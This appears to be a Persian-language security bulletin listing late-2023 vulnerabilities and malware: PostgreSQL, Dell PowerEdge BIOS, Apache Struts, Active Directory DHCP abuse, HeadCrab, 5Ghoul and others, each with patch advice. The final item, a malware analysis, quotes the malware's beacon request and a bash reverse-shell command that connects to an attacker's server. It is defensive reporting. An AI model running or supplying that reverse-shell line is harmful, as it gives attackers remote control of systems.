کشف آسیب‌پذیری در PostgreSQL

تاریخ ایجاد

یک آسیب‌پذیری با شناسه‌ CVE-2023-5869 و شدت بالا 8.8 در PostgreSQL شناسایی شده است که به دلیل سرریز اعداد صحیح در آرایه  SQL امکان اجرای کد دلخواه را برای مهاجم احراز هویت شده در پایگاه‌داده فراهم می‌آورد و مهاجم می‌تواند بایت‌های دلخواه را در حافظه بنویسد و حافظه سرور را بخواند. این آسیب‌پذیری به‌دلیل سرریز اعداد صحیح در آرایه رخ می‌دهد و مهاجم از راه دور می‌تواند با داده‌های ساختگی خاص، سرریز را آغاز کند.

محصولات تحت تأثیر
این آسیب‌پذیریPostgreSQL  نسخه‌های 11، 12، 13، 14، 15 و 16 را تحت تأثیر خود قرار می‌دهد. 

توصیه‌های امنیتی
توصیه می‌شود کاربران در اسرع وقت نسبت به ارتقاء PostgreSQL به نسخه‌های 11.22، 12.17، 13.13، 14.10، 15.5 یا 16.1 اقدام نمایند.

منابع خبر:


[1] https://www.postgresql.org/support/security/CVE-2023-5869
[2] https://vuldb.com/?id.244948

کشف خطا در عملکرد خدمات Outlook برای کاربران Microsoft 365

تاریخ ایجاد

مایکروسافت طی بیانیه اخیر خود اعلام کرد که نوعی خطا در عملکرد خدمات Outlook برای کاربران Microsoft 365، موجب ارسال نامه الکترونیکی حاوی تعداد کثیری پوشه به گیرنده ‌شده است. هنگامی که کاربر قصد استفاده از Outlook  برای ارسال نامه الکترونیک در رابط کاربری خود را دارد، خطایی مبتنی بر “خطا در ارسال “(NDR) با کد “0x80040305” دریافت می‌کند. مایکروسافت به کاربرانی که تحت تاثیر این نقص قرار گرفته‌اند اعلام کرده است که در نظرداشته باشند که نامه‌های الکترونیک آن‌ها به گیرندگان نرسیده است و توصیه می‌شود نامه‌ الکترونیک خود را مجددا ارسال کنند.
طبق بیانیه محققین درباره این موضوع، خطایی مشابه،‌ در سال 2019 برای Outlook رخ داد و در پی آن نامه الکترونیکی ارسالی کاربران را با بیش از 500 پوشه برای گیرندگان ارسال می‌کرد، تکرار این موضوع نشان دهنده این است که مایکروسافت اعتنایی به برطرف سازی این خطا‌ به طور کامل نداشته است.
طی هفته اخیر مایکروسافت خطایی که موجب از کارافتادن Outlook در هنگام اجرا می‌شد، برطرف ساخت.


توصیه‌های امنیتی

  •  تا برطرف سازی کامل خطا، از سرویس outlook به صورت آنلاین، استفاده نشود.
  •  برای عملکرد بهتر، Outlook را مجددا راه‌اندازی کنید.


منبع خبر:


https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-email-sending-issues-for-users-wi…

آسیب‌پذیری در BIOS سرورهای شرکت DELL

تاریخ ایجاد

به تازگی محققان امنیتی، موفق به کشف یک آسیب‌پذیری به شناسه CVE-2023-32460 در نرم‌افزار BIOS سرورهای PowerEdge شرکت DELL شده‌اند. این آسیب‌پذیری به یک مهاجم احرازهویت نشده اجازه می‌دهد تا بتواند با بهره‌برداری از آن، سطح دسترسی خود بر روی سیستم آسیب‌پذیر بالا ببرد (privilege escalation). برای بهره‌‌‌‌برداری از این آسیب‌پذیری، مهاجم باید به سیستم دسترسی محلی (local) داشته باشد. دلیل به وجود آمدن این نقص امنیتی آن است که مهاجم اجازه دارد بدون پشت سر گذاشتن فرآیند احرازهویت، اقدام به اعمال تغییراتی در قابلیت‌های از BIOS کند؛ در حالیکه مجوز اعمال این تغییرات باید بعد از احرازهویت کاربر و بررسی سطح دسترسی آن کاربر امکان پذیر باشد. لازم به ذکر است که فرآیند بهره‌‌‌‌برداری از این آسیب‌پذیری هنوز توسط تیم امنیتی شرکت DELL در اختیار عموم قرار نگرفته است؛ در نتیجه اطلاعاتی در خصوص اینکه اعمال تغییرات در کدام قابلیت BIOS منجر به رخ دادن این آسیب‌پذیری می‌شود در دسترس نمی‌باشد.
 

محصولات تحت تأثیر
در جدول زیر لیست تمام محصولات شرکت DELL و نسخه‌های تحت تأثیر و وصله‌شده این آسیب‌پذیری آورده شده است. 

نام محصول

نسخه آسیب‌پذیر

نسخه وصله‌شده

PowerEdge R660

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge R760

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge C6620

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge MX760c

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge R860

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge R960

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge HS5610

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge HS5620

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge R660xs

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge R760xs

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge R760xd2

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge T560

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge R760xa

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge XE9680

نسخه 1.3.6 به قبل

نسخه 1.3.6 به بعد

PowerEdge XR5610

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge XR8610t

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge XR8620t

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge XR7620

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge XE8640

نسخه 1.3.6 به قبل

نسخه 1.3.6 به بعد

PowerEdge XE9640

نسخه 1.3.6 به قبل

نسخه 1.3.6 به بعد

PowerEdge R6615

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge R7615

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

PowerEdge R6625

نسخه 1.6.8 به قبل

نسخه 1.6.8 به بعد

PowerEdge R7625

نسخه 1.6.8 به قبل

نسخه 1.6.8 به بعد

PowerEdge C6615

نسخه 1.1.2به قبل

نسخه 1.1.2 به بعد

PowerEdge R650

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

PowerEdge R750

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

PowerEdge R750XA

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

PowerEdge C6520

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

PowerEdge MX750C

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

PowerEdge R550

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

PowerEdge R450

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

PowerEdge R650XS

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

PowerEdge R750XS

نسخه 1.12.1 به قبل

نسخه 1.12.1 به بعد

PowerEdge T550

نسخه 1.12.1 به قبل

نسخه 1.12.1 به بعد

PowerEdge XR11

نسخه 1.12.1 به قبل

نسخه 1.12.1 به بعد

PowerEdge XR12

نسخه 1.12.1 به قبل

نسخه 1.12.1 به بعد

PowerEdge T150

نسخه 1.8.1 به قبل

نسخه 1.8.1 به بعد

PowerEdge T350

نسخه 1.8.1 به قبل

نسخه 1.8.1 به بعد

PowerEdge R250

نسخه 1.8.1 به قبل

نسخه 1.8.1 به بعد

PowerEdge R350

نسخه 1.8.1 به قبل

نسخه 1.8.1 به بعد

PowerEdge XR4510c

نسخه 1.13.3 به قبل

نسخه 1.13.3 به بعد

PowerEdge XR4520c

نسخه 1.13.3 به قبل

نسخه 1.13.3 به بعد

PowerEdge R6515

نسخه 2.13.3 به قبل

نسخه 2.13.3  به بعد

PowerEdge R6525

نسخه 2.13.3 به قبل

نسخه 2.13.3  به بعد

PowerEdge R7515

نسخه 2.13.3 به قبل

نسخه 2.13.3  به بعد

PowerEdge R7525

نسخه 2.13.3 به قبل

نسخه 2.13.3  به بعد

PowerEdge C6525

نسخه 2.13.3 به قبل

نسخه 2.13.3  به بعد

PowerEdge XE8545

نسخه 2.13.3 به قبل

نسخه 2.13.3  به بعد

PowerEdge R740

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge R740XD

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge R640

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge R940

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge R540

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge R440

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge T440

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge XR2

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge R740XD2

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge R840

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge R940XA

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge T640

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge C6420

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge FC640

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge M640

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge M640 (for PE VRTX)

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge MX740C

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge MX840C

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

PowerEdge C4140

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

DSS 8440

نسخه 2.20.0 به قبل

نسخه 2.20.0  به بعد

PowerEdge XE2420

نسخه 2.20.0 به قبل

نسخه 2.20.0  به بعد

PowerEdge XE7420

نسخه 2.20.0 به قبل

نسخه 2.20.0  به بعد

PowerEdge XE7440

نسخه 2.20.0 به قبل

نسخه 2.20.0  به بعد

PowerEdge T140

نسخه 2.15.1 به قبل

نسخه 2.15.1  به بعد

PowerEdge T340

نسخه 2.15.1 به قبل

نسخه 2.15.1  به بعد

PowerEdge R240

نسخه 2.15.1 به قبل

نسخه 2.15.1  به بعد

PowerEdge R340

نسخه 2.15.1 به قبل

نسخه 2.15.1  به بعد

PowerEdge R6415

نسخه 1.21.0 به قبل

نسخه 1.21.0  به بعد

PowerEdge R7415

نسخه 1.21.0 به قبل

نسخه 1.21.0  به بعد

PowerEdge R7425

نسخه 1.21.0 به قبل

نسخه 1.21.0  به بعد

PowerEdge R730

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge R730xd

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge R630

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge C4130

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge R930

نسخه 2.13.0 به قبل

نسخه 2.13.0 به بعد

PowerEdge M630

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge M630 (for PE VRTX)

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge FC630

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge FC430

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge M830

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge M830 (for PE VRTX)

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge FC830

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

PowerEdge T630

نسخه 2.18.2 به قبل

نسخه 2.18.2 به بعد

PowerEdge R530

نسخه 2.18.2 به قبل

نسخه 2.18.2 به بعد

PowerEdge R430

نسخه 2.18.2 به قبل

نسخه 2.18.2 به بعد

PowerEdge T430

نسخه 2.18.2 به قبل

نسخه 2.18.2 به بعد

PowerEdge R830

نسخه 1.18.1 به قبل

نسخه 1.18.1  به بعد

PowerEdge C6320

نسخه 2.18.2 به قبل

نسخه 2.18.2 به بعد

PowerEdge T130

نسخه 2.19.1 به قبل

نسخه 2.19.1  به بعد

PowerEdge R230

نسخه 2.19.1 به قبل

نسخه 2.19.1  به بعد

PowerEdge T330

نسخه 2.19.1 به قبل

نسخه 2.19.1  به بعد

PowerEdge R330

نسخه 2.19.1 به قبل

نسخه 2.19.1  به بعد

Dell EMC Storage NX3240

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

Dell EMC Storage NX3340

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

Dell EMC NX440

نسخه 2.15.1 به قبل

نسخه 2.15.1  به بعد

Dell Storage NX3230

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

Dell Storage NX3330

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

Dell Storage NX430

نسخه 2.19.1 به قبل

نسخه 2.19.1  به بعد

Dell XC Core XC660
 

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

Dell XC Core XC760
 

نسخه 1.6.6 به قبل

نسخه 1.6.6 به بعد

Dell EMC XC Core XC450

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

Dell EMC XC Core XC650

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

Dell EMC XC Core XC750

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

Dell EMC XC Core XC750xa

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

Dell EMC XC Core XC6520

نسخه 1.12.1به قبل

نسخه 1.12.1 به بعد

Dell EMC XC Core 6420 System

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

Dell EMC XC Core XC640 System

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

Dell EMC XC Core XC740xd System

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

Dell EMC XC Core XC740xd2

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

Dell EMC XC Core XC940 System

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

Dell EMC XC Core XCXR2

نسخه 2.20.1 به قبل

نسخه 2.20.1 به بعد

Dell EMC XC Core XC7525

نسخه 2.13.3 به قبل

نسخه 2.13.3  به بعد

Dell XC6320 Hyper-converged Appliance

نسخه 2.18.2 به قبل

نسخه 2.18.2 به بعد

Dell XC430 Hyper-converged Appliance

نسخه 2.18.2 به قبل

نسخه 2.18.2 به بعد

Dell XC630 Hyper-converged Appliance

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

Dell XC730 Hyper-converged Appliance

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

Dell XC730XD Hyper-converged Appliance

نسخه 2.18.1 به قبل

نسخه 2.18.1به بعد

 

توصیه‌های امنیتی
به گفته محققان امنیتی شرکت DELL، لیست ارائه شده نهایی نمی‌باشد و کاربران محصولات این شرکت لازم است تا نهایی شدن این لیست جهت اطلاع از آخرین محصولات تحت تأثیر این آسیب‌پذیری و وصله‌های امنیتی منتشر شده اطلاعیه‌ها را پیگیری کنند.

منابع خبر:


[1] https://nvd.nist.gov/vuln/detail/CVE-2023-32460
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32460
[3]https://www.dell.com/support/kbdoc/en-us/000219550/dsa-2023-361-security-update-for-dell-poweredge-…

هدف قرار دادن Microsoft Active Directory

تاریخ ایجاد

اخیرأ مجموعه‌ای از حملات شناسایی شده‌اند که دامنه‌های Microsoft Active Directory را مورد هدف قرار می‌دهند. این حملات می‌تواند مهاجمان را قادر سازد تا سوابق DNS را دستکاری، Active Directory  را به خطر اندازد و دسترسی به اطلاعات حساس ذخیره شده در آن را فراهم سازد. این آسیب‌پذیری‌ها با استفاده از پیکربندی پیش‌فرض سرورهای Microsoft Dynamic Host Configuration Protocol (DHCP) قابل بهره‌برداری هستند. در حال حاضر، هیچ برنامه‌ای از سوی مایکروسافت جهت رفع این نقص امنیتی وجود ندارد. همچنین، محققان هیچ حمله فعالی را با استفاده از این آسیب‌پذیری‌ها مشاهده نکرده‌اند، آن‌ها تأکید می‌کنند که تعداد قابل توجهی از سازمان‌ها ممکن است در معرض خطر باشند.
وقتی سرور DHCP یک رکورد DNS را برای مشتریان ثبت می‌کند یا تغییر می‌دهد، از DNS Dynamic Updates  برای این کار استفاده می‌کند. به عبارت دیگر،DHCP DNS Dynamic Updates  بدون نیاز به احرازهویت توسط مشتری، فعال شده و سرورهای DHCP این ویژگی را به صورت پیش‌فرض فعال می‌کنند. مهاجم می‌تواند از سرور DHCP جهت اعتبارسنجی در سرور DNS به نفع خودش استفاده کند. به عبارت دیگر، مهاجم می‌تواند بدون نیاز به احراز هویت، دسترسی بهADIDNS  را به‌دست آورد.

توصیه‌های امنیتی
جهت جلوگیری از مخاطرات احتمالی این آسیب‌پذیری، رعایت نکات زیر حائز اهمیت می‌باشد:

  • غیرفعال کردن قابلیت DHCP DNS Dynamic Updates در سرور DHCP، جهت محدود کردن حملات احتمالی.
  • عدم استفاده از DNSUpdateProxy و غیرفعال کردن این ویژگی به طور دائم.


منبع خبر:

https://www.theregister.com/2023/12/07/attacks_abuse_microsoft_dhcp/

بدافزار HeadCrab و افزایش تهدیدات مخرب آن

تاریخ ایجاد

نسخه جدید بدافزار HeadCrab امکان دسترسی root به سرورهای Redis (Open Source) را فراهم می‌‌‌‌کند. نوع اول این بدافزار، 1200 سرور و نوع جدید آن، 1100 سرور را آلوده کرده است. بدافزار HeadCrab دستگاه‌های آلوده را برای استفاده در cryptomining و حملات دیگر به یک بات نت اضافه می‌‌‌‌کند.  نسخه ابتدایی بدافزار HeadCrab یک روت‌‌‌‌کیت نیست، اما در نسخه جدید، توانایی کنترل و ارسال پاسخ به بدافزار اضافه شده است و به این ترتیب به یک روت‌‌‌‌کیت کامل بدل گشته است. روت‌‌‌‌کیت بدافزاری است که دسترسی ریشه دارد و همه چیز را کنترل می‌کند. به این ترتیب می‌‌‌‌توان آنچه را که کاربر می‌بیند، کنترل نمود.
نوع جدید بدافزار HeadCrab به مهاجم اجازه می‌دهد با حذف دستورات سفارشی و افزودن رمزگذاری به زیرساخت سرور کنترل و فرمان، اقدامات خود را پنهان کند. یکی از عناصر منحصر به فرد HeadCrab یک mini blog است که نویسنده بدافزار، جزئیات فنی بدافزار و یک آدرس ایمیل Proton Mail را جهت ناشناس ماندن در آن نوشته است. محققان Aqua Security از این ایمیل برای تماس با سازنده HeadCrab - با نام رمز Ice9 - استفاده کردند، اما نتوانستند نام یا مکان او را تعیین کنند. با این حال، Ice9 به محققان گفت که آن‌ها اولین افرادی بودند که به او ایمیل زدند. در مکالمات ایمیلی با محققان، Ice9 اذعان داشتند که این بدافزار عملکرد سرور را کاهش نمی‌‌‌‌دهد و می‌‌‌‌تواند سایر بدافزارها را حذف کند. او همچنین یک هش از بدافزار را برای محققان ارسال کرد تا بتوانند آن را بررسی کنند.

محصولات تحت تاثیر
براساس تحقیقات انجام شده، HeadCrab بر آلوده‌‌‌‌سازی سرورهای Redis تمرکز دارد. هنگامی که مهاجم از دستور SLAVEOF استفاده می‌‌‌‌کند، یک ماژول مخرب دانلود شده و دو فایل جدید اجرا می‌‌‌‌شود: یک cryptominer و یک فایل پیکربندی. سپس HeadCrab سرور Redis را آلوده می‌‌‌‌کند. به گفته محققان، این فرآیند شامل دستوری است که به مدیران اجازه می‌دهد تا یک سرور را در یک کلاستر Redis به عنوان salve برای یک سرور master دیگر در خوشه تعیین کنند. پس از آلوده شدن سرور، Ice9 کنترل کامل زیرساخت سرور را در دست دارد. نسخه جدید با توانمندی‌‌‌‌های روت‌‌‌‌کیت، امکان مخفی کردن فعالیت‌های مهاجم و بهبود فرایند رمزنگاری را فراهم می‌‌‌‌کند.

توصیه‌های امنیتی
محققان توصیه کردند که سازمان‌ها، آسیب‌پذیری‌ها و پیکربندی‌های نادرست را در سرورهای خود اسکن کنند و از حالت محافظت شده در Redis استفاده کنند تا احتمال مخاطرات HeadCrab را کاهش دهند.

منابع خبر:


[1]https://www.darkreading.com/cyberattacks-data-breaches/headcrab-malware-variants-commandeer-thousan…
[2]https://hackdojo.io/articles/E59PQMNKQ/-headcrab-malware-variants-commandeer-thousands-of-servers

کشف آسیب‌پذیری در Apache Struts 2

تاریخ ایجاد

Apache Struts به‌روزرسانی‌های جدیدی را برای framework برنامه کاربردی وب (Open source) خود منتشر کرده است. این به‌روزرسانی‌ها، آسیب‌پذیری بحرانی (CVE-2023-50164) را بررسی می‌کنند که در صورت بهره‌برداری، می‌تواند منجر به اجرای کد از راه دور شود. Apache Struts 2 به عنوان یک framework جاوا مدرن و Open source مورد استفاده قرار گرفته و یک پلتفرم قوی جهت توسعه برنامه‌های کاربردی وب، متناسب با سطح سازمانی ارائه می‌دهد.
آسیب‌پذیری امنیتی شناسایی‌شده با شناسه CVE-2023-50164 این پتانسیل را دارد که مهاجم را قادر سازد پارامترهای مرتبط با آپلود فایل‌ها را دستکاری کند و در نتیجه پیمایش مسیر را تسهیل بخشد. در شرایط خاص، این دستکاری می‌تواند مهاجم را قادر سازد تا یک فایل مخرب را آپلود و کد دلخواه خود را از راه دور بر روی سیستم آسیب‌دیده اجرا کند. 

محصولات تحت تأثیر
این آسیب‌پذیری Apache Struts نسخه های 2.0.0 تا 2.5.32 و 6.0.0 تا 6.3.0.1 را تحت تأثیر قرار می‌دهد.

توصیه‌های امنیتی
 به کاربران توصیه می‌شود در اسرع وقت Apache Struts را به نسخه‌های Apache Struts 2.5.33 و 6.3.0.2 ارتقاء دهند.

منبع خبر:

https://www.helpnetsecurity.com/2023/12/08/cve-2023-50164/ 

کشف آسیب‌پذیری‌های حوزه فناوری 5G

تاریخ ایجاد

مجموعه‌ای از آسیب‌پذیری‌هایی که اخیراً بر مودم‌های 5G که توسط کوالکام و مدیاتک توسعه یافته‌اند، شناسایی شده‌اند که به آن «5Ghoul» می‌گویند، در مجموع 710 مدل گوشی هوشمند 5G وابسته به شرکت‌های Google (اندروید) و اپل وجود دارد که علاوه بر این، روترها و مودم‌های USB نیز تحت تأثیر این آسیب‌پذیری‌ها قرار دارند.
حملات 5Ghoul طیفی از تأثیرات را در پی داشته است که از وقفه‌های گذرا در سرویس تا کاهش قابل توجه‌ در عملکرد شبکه را شامل می‌شود. طبق گفته محققان، مهاجم با شبیه‌سازی یک ایستگاه اصلی 5G می‌تواند به راحتی از این نقاط ضعف به صورت بی‌سیم بهره‌برداری کند. این امر حتی در شرایطی که مهاجمان جزئیاتی از سیم کارت هدف در اختیار ندارند صادق است، زیرا حمله قبل از مرحله احراز هویت شبکه (NAS) صورت می‌گیرد. برای انجام یک حمله، مهاجم فقط باید با استفاده از پارامترهای اتصال برج سلولی شناخته شده مانند SSB ARFCN، کد منطقه ردیابی، شناسه سلول فیزیکی، و نقطه A فرکانس، gNB معتبر را جعل کند.
 
 

1

شمای کلی از حمله 5Ghoul

ده آسیب‌پذیری 5Ghoul که تا 7 دسامبر 2023 به طور عمومی برای کوالکام و مدیاتک افشا شده‌اند، عبارتند از:
•    CVE-2023-33043: یک نقص را در مودم‌های Qualcomm X55/X60 نشان می‌دهد که در آن دریافت یک PDU MAC/RLC نامعتبر می‌تواند منجر به انجام حمله منع سرویس (DoS) شود. مهاجمان، با استفاده از یک gNB در معرض خطر، می‌توانند یک فریم MAC downlink معیوب را به تجهیزات کاربر 5G (UE) ارسال کنند که منجر به توقف کوتاه سیستم و راه‌اندازی مجدد مودم می‌شود.
•    CVE-2023-33044 و CVE-2023-33042 : این آسیب‌پذیری نیز  منجر به انجام حمله منع سرویس (DoS) در مودم‌های Qualcomm X55/X60 خواهد شد و مهاجم می‌تواند یک NAS PDU ناقص را به تجهیزات کاربر (UE) ارسال کند که منجر به خرابی مودم و راه‌اندازی مجدد آن می شود. در آسیب‌پذیری با شناسه CVE-2023-33042 مهاجم می‌تواند یک قاب RRC ناقص را در طول پروسه پیوست RRC ارسال کند، اتصال 5G را غیرفعال کند.
•    CVE-2023-32842: تنظیم RRC نامعتبر spCellConfig باعث انجام حمله DoS در مودم‌های MediaTek Dimensity 900/1200 می‌شود. این آسیب‌پذیری به دلیل راه‌اندازی اتصال RRC نادرست است که منجر به خرابی مودم و راه‌اندازی مجدد دستگاه‌های آسیب‌دیده می‌شود.
•    CVE-2023-32844 : این شناسه در واقع یک آسیب‌پذیری در مودم‌های MediaTek Dimensity 900/1200 مربوط به RRC (Radio Resource Control) نامعتبر PUCCH (Physical Uplink Control Channel) CSIReportConfig می‌باشد و به مهاجم امکان انجام حمله منع سرویس را می‌دهد.
•    CVE-2023-20702: آسیب‌پذیری در مودم‌های MediaTek Dimensity 900/1200 که امکان حمله DoS را از طریق یک توالی داده RLC  نامعتبر فراهم خواهد کرد. 
•    CVE-2023-32846: پیکربندی فیزیکی CellGroup RRC کوتاه شده که منجر به حمله DoS در مودم‌های مدیاتک Dimensity 900/1200 می‌شود. تنظیم ناقص اتصال RRC می‌تواند منجر به خرابی مودم شود.
•    CVE-2023-32841: جستجوی RRC نامعتبر SpacesToAddModList باعث حمله DoS در مودم‌های MediaTek Dimensity 900/1200 می‌شود. این نقص شامل راه‌اندازی اتصال RRC ناقص است که باعث خرابی مودم در دستگاه‌های آسیب‌دیده می‌شود.
•    CVE-2023-32843: پیکربندی نادرست Uplink RRC باعث ایجاد حمله DoS در مودم‌های MediaTek Dimensity 900/1200 می‌شود. 
•    CVE-2023-32845: پیکربندی RRC Uplink Null  منجر به انجام حمله منع سرویس (DoS) در مودم‌های MediaTek Dimensity 900/1200 می‌شود. یک تنظیم ناقص اتصال RRC با فیلدهای محموله RRC خاص که روی null تنظیم شده است، می‌تواند منجر به خرابی مودم شود.
CVE-2023-33042 نگرانی‌های قابل توجهی را در پی دارد زیرا دارای قابلیت وادار کردن دستگاه به قطع اتصال از شبکه 5G و بازگشت به اتصال 4G است. این انتقال دستگاه را در معرض آسیب‌پذیری‌های حوزه 4G قرار می‌دهد، در نتیجه طیف حملات احتمالی را که ممکن است با آن مواجه شود، افزایش می‌دهد.
 
 

2

حمله downgrade 5G به 4G

محصولات تحت تأثیر
برخی از محصولات آسیب‌پذیر شامل گوشی‌های POCO، Black، Lenovo، AGM، Google، TCL، Redmi، HTC، Microsoft و Gigaset هستند که لیست کامل آن در تصویر زیر آورده شده است.
 

3

 
توصیه‌های امنیتی
Qualcomm and MediaTek  هر دو برای این نقص امنیتی اقداماتی انجام داده‌اند و آن را در اختیار تولیدکنندگان قرار داده‌اند ولی به دلیل پیچیدگی عرضه نرم‌افزار، به‌ویژه در اندروید، مدتی طول می‌کشد تا این وصله‌های امنیتی از طریق انتشار به‌روزرسانی‌ها به دست کاربران برسد؛ اما اگر نگران نقص‌های 5Ghool هستید، عملی‌ترین رویکرد آن است که از استفاده از فناوری 5G تا زمانی که وصله‌های امنیتی آن منتشر نشود، خودداری کنید. نشانه‌های حمله 5Ghoul شامل از دست دادن اتصالات 5G، عدم توانایی در اتصال مجدد تا زمانی که دستگاه راه‌اندازی مجدد نشود و افت مداوم به 4G با وجود در دسترس بودن شبکه 5G در منطقه است.

منبع خبر:


https://www.bleepingcomputer.com/news/security/new-5ghoul-attack-impacts-5g-phones-with-qualcomm-me…;

بهره‌برداری از snappy TCP تهدیدی برای سیستم‌عامل‌های لینوکس و یونیکس

تاریخ ایجاد

مهاجمان با بهره‌برداری از “TCP” معکوس، در سیستم‌عامل‌های لینوکس و یونیکس را دچار مخاطره خواهند کرد. این بهره‌برداری به آن‌ها اجازه می‌دهد تا بدون افشاء هویت و موقعیت مکانی‌شان، دستورات و اطلاعات مد نظر خود را اجرا و داده‌ها را سرقت نمایند و امنیت سیتم‌عامل را به خطر می‌اندازند. آن‌ها با بهره‌برداری از آسیب‌پذیری با شناسه‌های CVE-2021-44228، CVE-2021-21974 وCVE-2022-0847 به سیستم‌عامل هدف دسترسی پیدا کرده، سپس با اجرای “upxa.sh” شبکه سیستم‌عامل هدف را به سرور‌هایی که تحت کنترل دارند متصل می‌کنند.
 

a

جزئیات فایل “upxa.sh”.

 “TCP” با دارا بودن ویژگی‌های اولیه “C2” و شبکه Persistence، نوعی “Webshell” است که مهاجمان با ادغام آن با دو آسیب‌پذیری دیگر، امنیت ارتباط “OpenSSL” سرورخودشان را با شبکه کاربر به وسیله پروتکل “TLS” تأمین کرده و دیگری نیز با استخراج “IP” از 256 بایت اولیه فایل “conf”، هدف را به سرور متصل می‌کند. پس از ایجاد اتصال، بدافزار جستجو برای “X-Auth-43245-S-20” و “\r\n\r\n” در درخواست “HTTP” آغاز می‌کند. در این مرحله “TCP” معکوس شروع به کار می‌کند. بدافزار به دو روش عمل خواهد کرد :
1-    بدافزار از “OpenSSL” و پروتکل امنیتی رایج “TLS” جهت ایجاد نوعی لینک استفاده می‌کند.
2-    بد افزار به وسیله “IP” استخراج شده از فایل “conf”، به هدف متصل می‌شود و سپس دستور زیر را ارسال می‌کند:


GET /ssl.php HTTP/1.1\\r\\nHost: %s\\r\\nHostname: %s\\r\\nConnection: close\\r\\n\\r\\n

همانند نمونه‌هایی که در گذشته رخ داده‌اند، این بدافزار با ارسال نوعی “bash” یک فایل جدید با نام “update” ایجاد می‌کند:


bash -c \\”./update exec:’bash -li’,pty,stderr,setsid,sigint,sane OPENSSL:%s:%d,verify=0 2>&1>/dev/null&\\”


در این بدافزار از زنجیره ابزار “GLIBC” استفاده شده  است که توانایی آن را دارد تا عملیات خود را به صورت خودکفا و بدون نیاز به همسان‌سازی خود با کتابخانه‌های سیستم هدف انجام دهد. فایل‌هایی که دارای پسوند “ELF” هستند، دارای تاریخ Compile نیستند که همین امر کمک می‌کند تا سیر تکاملی بدافزار را پنهان کند.

توصیه‌های امنیتی
1. چک کردن فایل log.
